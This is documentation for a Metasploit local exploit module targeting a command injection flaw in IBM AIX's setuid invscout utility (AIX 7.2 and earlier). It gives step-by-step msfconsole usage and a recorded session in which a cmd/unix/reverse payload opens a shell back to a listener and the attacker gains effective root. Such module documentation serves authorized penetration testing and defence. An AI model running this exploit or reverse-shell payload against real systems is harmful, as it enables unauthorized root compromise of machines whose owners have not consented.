## Vulnerable Application

This module exploits a command injection vulnerability in IBM AIX
invscout set-uid root utility present in AIX 7.2 and earlier.

The undocumented -rpm argument can be used to install an RPM file;
and the undocumented -o argument passes arguments to the rpm utility
without validation, leading to command injection with effective-uid
root privileges.

This module has been tested successfully on AIX 7.2.

## Verification Steps

1. `msfconsole`
1. Get a session
1. `use exploit/aix/local/invscout_rpm_priv_esc`
1. `set session <session>`
1. `run`

## Options

### INVSCOUT_PATH

Path to invscout executable (default: `/usr/sbin/invscout`)

## Scenarios

### IBM AIX 7.2

```
msf6 > use exploit/aix/local/invscout_rpm_priv_esc
msf6 exploit(aix/local/invscout_rpm_priv_esc) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(aix/local/invscout_rpm_priv_esc) > set session 1
session => 1
msf6 exploit(aix/local/invscout_rpm_priv_esc) > run

[*] Started reverse TCP double handler on 192.168.200.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Output: uid=204(user) gid=1(staff) euid=0(root)
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 9BZSm5LKtW9OMKHg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "9BZSm5LKtW9OMKHg\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:49036) at 2023-05-13 18:29:23 -0400

id
uid=204(user) gid=1(staff) euid=0(root)
uname -a
AIX localhost 2 7 000000000000
```
